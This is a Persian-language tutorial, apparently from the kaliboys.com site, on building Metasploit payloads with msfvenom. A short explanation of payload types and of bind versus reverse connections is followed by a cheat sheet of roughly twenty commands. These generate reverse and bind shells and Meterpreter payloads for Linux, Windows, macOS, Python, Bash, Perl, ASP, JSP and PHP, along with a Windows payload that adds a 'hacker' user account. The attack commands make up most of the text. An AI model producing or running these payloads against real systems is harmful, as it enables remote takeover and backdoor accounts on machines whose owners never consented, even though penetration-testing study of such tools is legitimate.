
آموزش ساخت پیلود برای انواع سیستم ها
با سلام و درود خدمت کاربران محترم kaliboys.com. در این آموزش سعی می کنیم تا با ساخت پیلود برای انواع پلتفرم ها در فریم ورک محبوب متاسپلویت آشنا بشیم. همچنین با مفهموم کلی پیلود و انواع آن اشنا خواهیم شد.
پیلود(payload) چیست؟
یک پیلود در Metasploit به یک ماژول سوءاستفاده اشاره دارد. سه نوع مختلف از پیلودها در Metasploit وجود دارند که عبارتند از:
۱- Singles: کاملا محرمانه و مستقل عمل می کنند.
۲- Stagers: یک اتصال شبکه ای بین مهاجم و قربانی را ایجاد می کند.
۳- Stages: از جمله ویژگی های این نوع پیلودها، عدم محدودیت سایز در meterpreter ، تزریق VNC و شل (ipwn) برای ایفون است.
تنوع پیلود ها اجازه می دهد تا در انواع مختلف از سناریو های تست نفوذ مفید باشند. این که آیا یک پیلود Stages است یا نه، میتوان با وجود “/” در نام آن تشخیص داد. به مثال های زیر دقت کنید:
windows/shell_bind_tcp یک پیلود غیر مرحله ای(Stages) است، در حالی که windows/shell /bind_tcp یک پیلود دو مرحله ای است که شامل (stager (bind_tcp و (stage (shell است.
تفاوت روش bind با Reverse در چیست؟
در روش bind یک پورت روی سیستم تارگت باز می شود تا نفوذگر به آن پورت متصل شود. ولی در روش Reverse، هکر یک پورت بر روی سیستم خود باز می کند تا سیستم تارگت به سیستم او وصل شود.
شل با دسترسی Meterpreter برای سیستم عامل لینوکس
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf shell.elf
msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf shell.elf
شل معکوس برای سیستم عامل لینوکس
msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf shell.elf
msfvenom -p linux/x64/shell_reverse_tcp RHOST=IP LPORT=PORT -f elf shell.elf
شل با دسترسی Meterpreter برای سیستم عامل ویندوز
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe
msfvenom -p windows/meterpreter/bind_tcp RHOST= IP LPORT=PORT -f exe shell.exe
شل معکوس برای سیستم عامل ویندوز
msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe shell.exe
شل معکوس برای سیستم عامل مک
msfvenom -p osx/x86/shell_reverse_tcp LHOST=IP LPORT=PORT -f macho shell.macho
msfvenom -p osx/x86/shell_bind_tcp RHOST=IP LPORT=PORT -f macho shell.macho
پیلود برای ایجاد یوزر و پسورد در سیستم عامل ویندوز
msfvenom -p windows/adduser USER=hacker PASS=password -f exe useradd.exe
شل معکوس برای Python
msfvenom -p cmd/unix/reverse_python LHOST=IP LPORT=PORT -f raw shell.py
شل معکوس برای Bash
msfvenom -p cmd/unix/reverse_bash LHOST=IP LPORT=PORT -f raw shell.sh
شل معکوس برای Perl
msfvenom -p cmd/unix/reverse_perl LHOST=IP LPORT=PORT -f raw shell.pl
شل با دسترسی Meterpreter برای پلتفرم Asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f asp shell.asp
شل معکوس برای Java Script
msfvenom -p java/jsp_shell_reverse_tcp LHOST=IP LPORT=PORT -f raw shell.jsp
شل با دسترسی Meterpreter با زبان PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=IP LPORT=PORT -f raw shell.php
شل معکوس برای PHP
msfvenom -p php/reverse_php LHOST=IP LPORT=PORT -f raw phpreverseshell.php
Always work together to make progress